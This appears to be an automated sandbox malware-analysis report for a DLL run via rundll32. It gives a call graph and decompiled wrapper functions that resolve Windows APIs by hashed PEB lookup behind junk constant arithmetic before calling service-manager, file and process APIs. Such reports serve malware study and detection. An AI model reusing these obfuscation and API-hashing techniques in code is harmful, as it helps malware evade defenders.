5025->5024 5027 238758 5026->5027 5028 23aa30 GetPEB 5027->5028 5029 2387b7 5028->5029 5029->4878 5031 2246e5 5030->5031 5032 23aa30 GetPEB 5031->5032 5033 224737 5032->5033 5033->4910 5035 23c3bc 5034->5035 5036 23c627 5035->5036 5047 22a3a3 5035->5047 5036->4910 5039 22ed7e GetPEB 5040 23c5e2 5039->5040 5040->5036 5041 22ed7e GetPEB 5040->5041 5041->5040 5043 227c52 5042->5043 5044 23cadf GetPEB 5043->5044 5045 227df1 5043->5045 5051 226ca0 5043->5051 5044->5043 5045->4910 5048 22a3c0 5047->5048 5049 23aa30 GetPEB 5048->5049 5050 22a41a 5049->5050 5050->5036 5050->5039 5052 226cb8 5051->5052 5053 23aa30 GetPEB 5052->5053 5054 226d15 5053->5054 5054->5043 5056 23aa30 GetPEB 5055->5056 5057 22f8f4 5056->5057 5057->4182 5059 22a9e6 5058->5059 5060 23aa30 GetPEB 5059->5060 5061 22aa3f 5060->5061 5061->4182 5063 228ee7 5062->5063 5064 23aa30 GetPEB 5063->5064 5065 228f54 5064->5065 5065->4182 5067 22435e 5066->5067 5068 227ff2 2 API calls 5067->5068 5069 22ae64 GetPEB 5067->5069 5070 22457c 5067->5070 5071 2245a6 5067->5071 5068->5067 5069->5067 5077 22ae64 5070->5077 5071->4182 5074 224e8f 5073->5074 5075 23aa30 GetPEB 5074->5075 5076 224ed7 5075->5076 5076->4182 5078 22ae8b 5077->5078 5079 23aa30 GetPEB 5078->5079 5080 22aee2 5079->5080 5080->5071 5083 23001b 5081->5083 5082 238606 2 API calls 5082->5083 5083->5082 5086 23031b 5083->5086 5088 22a8b0 GetPEB 5083->5088 5089 22cd29 5083->5089 5093 22ee81 5083->5093 5098 222206 5083->5098 5086->4186 5088->5083 5090 22cd3f 5089->5090 5091 23aa30 GetPEB 5090->5091 5092 22cd9f 5091->5092 5092->5083 5102 238f15 5093->5102 5097 22eff7 5097->5083 5099 22222a 5098->5099 5100 22a42d GetPEB 5099->5100 5101 222249 5100->5101 5101->5083 5103 238f34 5102->5103 5104 23aa30 GetPEB 5103->5104 5105 22efa8 5104->5105 5105->5097 5106 23db43 5105->5106 5107 23db6c 5106->5107 5108 23aa30 GetPEB 5107->5108 5109 23dbd4 5108->5109 5109->5097 5111 227b13 5110->5111 5112 23aa30 GetPEB 5111->5112 5113 227b7c 5112->5113 5113->4196 5115 238b6f 5114->5115 5116 23aa30 GetPEB 5115->5116 5117 238bd5 5116->5117 5117->4006 5119 229df5 5118->5119 5121 22a305 5119->5121 5124 23dcf7 RtlAllocateHeap GetPEB 5119->5124 5125 22a918 GetPEB 5119->5125 5126 2247ce GetPEB 5119->5126 5127 22a8b0 GetPEB 5119->5127 5128 229dcf 2 API calls 5119->5128 5129 224635 5119->5129 5133 227e00 5119->5133 5137 228abf 5119->5137 5121->4217 5124->5119 5125->5119 5126->5119 5127->5119 5128->5119 5130 22464b 5129->5130 5131 23aa30 GetPEB 5130->5131 5132 2246b0 5131->5132 5132->5119 5134 227e18 5133->5134 5135 23aa30 GetPEB 5134->5135 5136 227e79 5135->5136 5136->5119 5138 228ad1 5137->5138 5139 23aa30 GetPEB 5138->5139 5140 228b32 5139->5140 5140->5119 5152 22e2cc 5141->5152 5145 229ba6 5144->5145 5175 2291dd 5145->5175 5148 229d26 5148->4226 5151 231e67 2 API calls 5151->5148 5156 22e2f1 5152->5156 5157 22e4ef 5156->5157 5159 225357 5156->5159 5161 225988 5156->5161 5164 228e4d 5156->5164 5167 23c15d 5156->5167 5171 222a58 5156->5171 5160 231e67 2 API calls 5157->5160 5159->4226 5160->5159 5162 23aa30 GetPEB 5161->5162 5163 2259db 5162->5163 5163->5156 5165 235c73 GetPEB 5164->5165 5166 228eb3 5165->5166 5166->5156 5168 23c176 5167->5168 5169 23aa30 GetPEB 5168->5169 5170 23c1de 5169->5170 5170->5156 5172 222a71 5171->5172 5173 23aa30 GetPEB 5172->5173 5174 222ad6 5173->5174 5174->5156 5176 23aa30 GetPEB 5175->5176 5177 22923b 5176->5177 5177->5148 5178 2276aa 5177->5178 5179 2276cd 5178->5179 5180 23aa30 GetPEB 5179->5180 5181 227723 5180->5181 5181->5151 5183 23e365 5182->5183 5184 22a42d GetPEB 5183->5184 5185 23e38d 5184->5185 5185->4229 5188 22410d 5186->5188 5189 22421e 5188->5189 5190 23dcf7 2 API calls 5188->5190 5192 22421c 5188->5192 5193 22aad6 GetPEB 5188->5193 5194 22a8b0 GetPEB 5188->5194 5206 221f53 5188->5206 5191 221fd1 GetPEB 5189->5191 5190->5188 5191->5192 5192->4258 5193->5188 5194->5188 5196 236c65 5195->5196 5197 224b61 GetPEB 5196->5197 5198 236d92 5196->5198 5201 236db0 5196->5201 5214 229d31 5196->5214 5197->5196 5210 236637 5198->5210 5201->4258 5203 22b1db 5202->5203 5204 23aa30 GetPEB 5203->5204 5205 22b231 5204->5205 5205->4252 5207 221f6f 5206->5207 5208 23aa30 GetPEB 5207->5208 5209 221fc3 5208->5209 5209->5188 5211 236659 5210->5211 5212 23aa30 GetPEB 5211->5212 5213 2366b7 5212->5213 5213->5201 5215 229d52 5214->5215 5216 23aa30 GetPEB 5215->5216 5217 229dc1 5216->5217 5217->5196 5218 22e991 5219 22ea62 5218->5219 5223 22ea8d 5218->5223 5224 22f8fd 5219->5224 5222 2293ed 2 API calls 5222->5223 5235 22fde0 5224->5235 5225 22ffd1 5227 22ab87 3 API calls 5225->5227 5226 224b61 GetPEB 5226->5235 5228 22ea75 5227->5228 5228->5222 5228->5223 5229 22f899 GetPEB 5229->5235 5230 2346bb 2 API calls 5230->5235 5231 23da22 GetPEB 5231->5235 5233 23dcf7 RtlAllocateHeap GetPEB 5233->5235 5234 22a8b0 GetPEB 5234->5235 5235->5225 5235->5226 5235->5228 5235->5229 5235->5230 5235->5231 5235->5233 5235->5234 5236 2247ce GetPEB 5235->5236 5237 22b23c 5235->5237 5236->5235 5238 22b254 5237->5238 5239 23aa30 GetPEB 5238->5239 5240 22b2b8 lstrcmpiW 5239->5240 5240->5235 5254 2281b7 5264 228679 5254->5264 5255 238519 GetPEB 5255->5264 5257 228f65 2 API calls 5257->5264 5258 23da22 GetPEB 5258->5264 5259 227ff2 2 API calls 5259->5264 5260 2286e2 5261 22b6cf GetPEB 5261->5264 5262 2286c6 5266 231e67 2 API calls 5262->5266 5263 22b23c 2 API calls 5263->5264 5264->5255 5264->5257 5264->5258 5264->5259 5264->5260 5264->5261 5264->5262 5264->5263 5267 23c264 5264->5267 5271 23458f 5264->5271 5266->5260 5268 23c291 5267->5268 5269 23aa30 GetPEB 5268->5269 5270 23c2dd 5269->5270 5270->5264 5272 2345a2 5271->5272 5273 23aa30 GetPEB 5272->5273 5274 234619 5273->5274 5274->5264 5279 230a96 5281 230aa6 5279->5281 5282 234087 GetPEB 5279->5282 5282->5281 5283 224c5d 5284 224d8d 5283->5284 5285 238606 2 API calls 5284->5285 5290 224dd2 5284->5290 5286 224da8 5285->5286 5291 22cbdf 5286->5291 5289 22a8b0 GetPEB 5289->5290 5292 22cbfb 5291->5292 5293 224dbc 5292->5293 5295 234011 5292->5295 5293->5289 5296 234026 5295->5296 5297 23aa30 GetPEB 5296->5297 5298 234078 5297->5298 5298->5292

                                                                                                                          Executed Functions

                                                                                                                          Function 0022912C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 250 22912c-2291af call 2320b9 call 23aa30 OpenSCManagerW
                                                                                                                          C-Code - Quality: 54%
                                                                                                                          			E0022912C(int __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t32;
				signed int _t34;
				int _t43;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t43 = __ecx;
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__ecx);
				E002320B9(_t24);
				_v12 = 0x4657ea;
				_t34 = 0x1b;
				_v12 = _v12 / _t34;
				_v12 = _v12 ^ 0x000ac4f3;
				_v8 = 0xb5c996;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x19;
				_v8 = _v8 + 0x3329;
				_v8 = _v8 ^ 0x01161fa0;
				E0023AA30(0x14e, 0x20a9b263, _t34, 0x18e12c58);
				_t32 = OpenSCManagerW(0, 0, _t43); // executed
				return _t32;
			}









                                                                                                                          0x0022912f
                                                                                                                          0x00229130
                                                                                                                          0x00229133
                                                                                                                          0x00229138
                                                                                                                          0x0022913a
                                                                                                                          0x0022913d
                                                                                                                          0x0022913e
                                                                                                                          0x00229141
                                                                                                                          0x00229143
                                                                                                                          0x00229144
                                                                                                                          0x00229149
                                                                                                                          0x0022915a
                                                                                                                          0x00229162
                                                                                                                          0x0022916a
                                                                                                                          0x00229171
                                                                                                                          0x00229178
                                                                                                                          0x00229186
                                                                                                                          0x00229189
                                                                                                                          0x00229190
                                                                                                                          0x0022919d
                                                                                                                          0x002291a8
                                                                                                                          0x002291af

                                                                                                                          APIs
                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000B11AB), ref: 002291A8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ManagerOpen
                                                                                                                          • String ID: WF
                                                                                                                          • API String ID: 1889721586-2390014890
                                                                                                                          • Opcode ID: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                          • Instruction ID: 1ec3f580195613909d94614bce3d319d67826ea4c4b035f6fd9e36bbca4b61c0
                                                                                                                          • Opcode Fuzzy Hash: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                          • Instruction Fuzzy Hash: E80169B1911108FBEB08CB95DD4ACAFBFB8EB85714F108099F404A7200D3B15F249AA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002242C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39serviceCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 255 2242c4-224345 call 2320b9 call 23aa30 OpenServiceW
                                                                                                                          C-Code - Quality: 48%
                                                                                                                          			E002242C4(void* __ecx, void* __edx, intOrPtr _a4, int _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t34 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002320B9(_t24);
				_v8 = 0x971c9e;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xbdaa;
				_v8 = _v8 | 0x44f2c0c3;
				_v8 = _v8 ^ 0x44fb9439;
				_v12 = 0x762558;
				_v12 = _v12 | 0xdc63e739;
				_v12 = _v12 ^ 0xdc7b8d87;
				E0023AA30(0x20c, 0x20a9b263, __ecx, 0x47b96070);
				_t29 = OpenServiceW(_t34, _a12, _a8); // executed
				return _t29;
			}








                                                                                                                          0x002242c7
                                                                                                                          0x002242c8
                                                                                                                          0x002242ca
                                                                                                                          0x002242cd
                                                                                                                          0x002242cf
                                                                                                                          0x002242d2
                                                                                                                          0x002242d5
                                                                                                                          0x002242d8
                                                                                                                          0x002242db
                                                                                                                          0x002242dc
                                                                                                                          0x002242dd
                                                                                                                          0x002242e2
                                                                                                                          0x002242ec
                                                                                                                          0x002242f5
                                                                                                                          0x002242fc
                                                                                                                          0x00224303
                                                                                                                          0x0022430a
                                                                                                                          0x00224311
                                                                                                                          0x00224318
                                                                                                                          0x00224330
                                                                                                                          0x0022433f
                                                                                                                          0x00224345

                                                                                                                          APIs
                                                                                                                          • OpenServiceW.ADVAPI32(00000000,?,2635DC09,?,?,?,2635DC09,00234A8F,?,?,2635DC09), ref: 0022433F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: OpenService
                                                                                                                          • String ID: X%v
                                                                                                                          • API String ID: 3098006287-3430654708
                                                                                                                          • Opcode ID: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                          • Instruction ID: c3f856f7d6e1f6bbf38801f601657d25fb05a1798e1b5af9866dd778337b3768
                                                                                                                          • Opcode Fuzzy Hash: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                          • Instruction Fuzzy Hash: F30104B281120CFBDF15DFD4D9468DEBF79EB14314F148198F90562221E2729B60AB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00228F65 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 260 228f65-229010 call 2320b9 call 23aa30 CreateFileW
                                                                                                                          C-Code - Quality: 35%
                                                                                                                          			E00228F65(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, long _a12, long _a20, intOrPtr _a24, long _a28, intOrPtr _a32, long _a40) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t32;
				void* _t38;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002320B9(_t32);
				_v28 = 0xee6fdc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x957ab3;
				_v12 = _v12 ^ 0x02d9a910;
				_v12 = _v12 + 0xffff8488;
				_v12 = _v12 ^ 0x02485b8e;
				_v8 = 0xf6b813;
				_v8 = _v8 + 0xffff9c70;
				_v8 = _v8 + 0xffff858c;
				_v8 = _v8 ^ 0x00f72129;
				E0023AA30(0xe9, 0x9df7cc0d, __ecx, 0xa7362403);
				_t38 = CreateFileW(_a4, _a20, _a40, 0, _a28, _a12, 0); // executed
				return _t38;
			}









                                                                                                                          0x00228f6d
                                                                                                                          0x00228f72
                                                                                                                          0x00228f73
                                                                                                                          0x00228f76
                                                                                                                          0x00228f79
                                                                                                                          0x00228f7c
                                                                                                                          0x00228f7f
                                                                                                                          0x00228f80
                                                                                                                          0x00228f83
                                                                                                                          0x00228f86
                                                                                                                          0x00228f8a
                                                                                                                          0x00228f8b
                                                                                                                          0x00228f90
                                                                                                                          0x00228f9f
                                                                                                                          0x00228faa
                                                                                                                          0x00228fb1
                                                                                                                          0x00228fb2
                                                                                                                          0x00228fb9
                                                                                                                          0x00228fc0
                                                                                                                          0x00228fc7
                                                                                                                          0x00228fce
                                                                                                                          0x00228fd5
                                                                                                                          0x00228fdc
                                                                                                                          0x00228fe3
                                                                                                                          0x00228ff0
                                                                                                                          0x00229009
                                                                                                                          0x00229010

                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(02485B8E,00EE6FDC,?,00000000,65528FD4,?,00000000), ref: 00229009
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                          • Instruction ID: 7695377490bc0970189aacaa2b5cab960e5a9b0dc91e8fcfa961f3cc4f282a61
                                                                                                                          • Opcode Fuzzy Hash: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                          • Instruction Fuzzy Hash: 0B111672900219FBCF219FA9DD098DFBFB6EF58354F118188F90862121D3328A65EB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00227F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 265 227f5d-227ff1 call 2320b9 call 23aa30 CreateProcessW
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0022AD99,?,?,?,181C8C04,0022AD99), ref: 00227FEB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 963392458-0
                                                                                                                          • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                          • Instruction ID: 99209d7272f3e1eaf9608c9f95ec42e42f8b3cc0138387abc74ef270b4f65e14
                                                                                                                          • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                          • Instruction Fuzzy Hash: B811D372402128BBDF619F91DD09CEF7F79EF093A4F149144FA1921121D2728A60EBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00224DDD Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 270 224ddd-224e73 call 2320b9 call 23aa30 SHFileOperationW
                                                                                                                          C-Code - Quality: 16%
                                                                                                                          			E00224DDD(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				int _t38;
				signed int _t40;
				signed int _t44;
				struct _SHFILEOPSTRUCTW* _t45;

				_push(_a12);
				_t45 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002320B9(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x8324bd;
				_v20 = 0xe59c0f;
				_v12 = 0xfa6a5a;
				_v12 = _v12 | 0x6fcfbea7;
				_t40 = 0x1a;
				_push(0x3771311d);
				_push(_t40);
				_v12 = _v12 * 0x42;
				_v12 = _v12 ^ 0xdff430a4;
				_v8 = 0x460bc4;
				_v8 = _v8 | 0x3946640e;
				_push(0xdf0d4f1a);
				_v8 = _v8 / _t40;
				_v8 = _v8 + 0x2a2;
				_v8 = _v8 ^ 0x023f16a4;
				_t44 = 0x58;
				E0023AA30(_t44);
				_t38 = SHFileOperationW(_t45); // executed
				return _t38;
			}













                                                                                                                          0x00224de4
                                                                                                                          0x00224de7
                                                                                                                          0x00224de9
                                                                                                                          0x00224dec
                                                                                                                          0x00224def
                                                                                                                          0x00224df1
                                                                                                                          0x00224df6
                                                                                                                          0x00224dfd
                                                                                                                          0x00224e06
                                                                                                                          0x00224e0d
                                                                                                                          0x00224e14
                                                                                                                          0x00224e21
                                                                                                                          0x00224e22
                                                                                                                          0x00224e27
                                                                                                                          0x00224e28
                                                                                                                          0x00224e2b
                                                                                                                          0x00224e32
                                                                                                                          0x00224e39
                                                                                                                          0x00224e45
                                                                                                                          0x00224e4a
                                                                                                                          0x00224e4d
                                                                                                                          0x00224e54
                                                                                                                          0x00224e63
                                                                                                                          0x00224e64
                                                                                                                          0x00224e6d
                                                                                                                          0x00224e73

                                                                                                                          APIs
                                                                                                                          • SHFileOperationW.SHELL32(12DA7D1B,?,?,?,?,?,?,?,?), ref: 00224E6D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileOperation
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3080627654-0
                                                                                                                          • Opcode ID: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                          • Instruction ID: 12667971c8dd31a0e80beebaf091f0db14574a0e31e91729d9933cd560787f84
                                                                                                                          • Opcode Fuzzy Hash: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                          • Instruction Fuzzy Hash: AE0139B6E01209FBCB14EFA4D9469DEBFB4EF40314F10C088E904A6251D3744B54AB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00225DDD Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E00225DDD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;
				void* _t31;
				void* _t33;
				intOrPtr _t34;

				_t31 = __edx;
				_t34 = __ecx;
				E002320B9(_t21);
				_v12 = 0x9fac18;
				_v12 = _v12 ^ 0x90454497;
				_v12 = _v12 ^ 0x90d3245f;
				_v8 = 0x647eb;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xffff0b9f;
				_v8 = _v8 ^ 0xfff54d3d;
				_t25 = E0023AA30(0x2d1, 0x9df7cc0d, __ecx, 0x5aaf08f1);
				_t26 =  *_t25(_t31, 0, _t34, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28, _t30, _t33, __ecx, __ecx); // executed
				return _t26;
			}












                                                                                                                          0x00225de9
                                                                                                                          0x00225deb
                                                                                                                          0x00225dfa
                                                                                                                          0x00225dff
                                                                                                                          0x00225e09
                                                                                                                          0x00225e15
                                                                                                                          0x00225e1c
                                                                                                                          0x00225e23
                                                                                                                          0x00225e27
                                                                                                                          0x00225e2b
                                                                                                                          0x00225e32
                                                                                                                          0x00225e4a
                                                                                                                          0x00225e58
                                                                                                                          0x00225e5f

                                                                                                                          APIs
                                                                                                                          • SetFileInformationByHandle.KERNEL32(65528FD4,00000000,?,00000028), ref: 00225E58
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileHandleInformation
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3935143524-0
                                                                                                                          • Opcode ID: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                          • Instruction ID: b57f4ff2eebaeff241e8e414d3b033bc2b56782d7408eaa022a4436388064250
                                                                                                                          • Opcode Fuzzy Hash: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                          • Instruction Fuzzy Hash: 2D01BCB6901208BBDB24DE90CC0AEEEBF74EF55314F108088F50466250E3B05B249BA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00221E22 Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 280 221e22-221ea6 call 2320b9 call 23aa30 RtlAllocateHeap
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E00221E22(long __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				void* _t34;
				signed int _t36;
				long _t42;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t42 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002320B9(_t27);
				_v12 = 0x309d17;
				_v12 = _v12 | 0x1b560655;
				_v12 = _v12 ^ 0x1b78328a;
				_v8 = 0xa187d;
				_v8 = _v8 + 0xa972;
				_t36 = 0x67;
				_v8 = _v8 / _t36;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x000b519a;
				E0023AA30(0x1c2, 0x9df7cc0d, _t36, 0x8eab3015);
				_t34 = RtlAllocateHeap(_a8, _t42, _a4); // executed
				return _t34;
			}









                                                                                                                          0x00221e25
                                                                                                                          0x00221e26
                                                                                                                          0x00221e28
                                                                                                                          0x00221e2b
                                                                                                                          0x00221e2d
                                                                                                                          0x00221e30
                                                                                                                          0x00221e33
                                                                                                                          0x00221e37
                                                                                                                          0x00221e38
                                                                                                                          0x00221e3d
                                                                                                                          0x00221e47
                                                                                                                          0x00221e50
                                                                                                                          0x00221e57
                                                                                                                          0x00221e5e
                                                                                                                          0x00221e6a
                                                                                                                          0x00221e72
                                                                                                                          0x00221e7a
                                                                                                                          0x00221e7e
                                                                                                                          0x00221e91
                                                                                                                          0x00221ea0
                                                                                                                          0x00221ea6

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(AF136809,000C892D,1B78328A,?,?,?,002280DB,?,00000000,AF136809), ref: 00221EA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                          • Instruction ID: 819a1e1d1a8800e51e854a39f40df36a82648236fbd42561c2a96686b514be7b
                                                                                                                          • Opcode Fuzzy Hash: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                          • Instruction Fuzzy Hash: BA014876901108FBEB05DFD4DC0A8DE7BB5EB45354F208099F90856211E7B29F24AB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002346BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
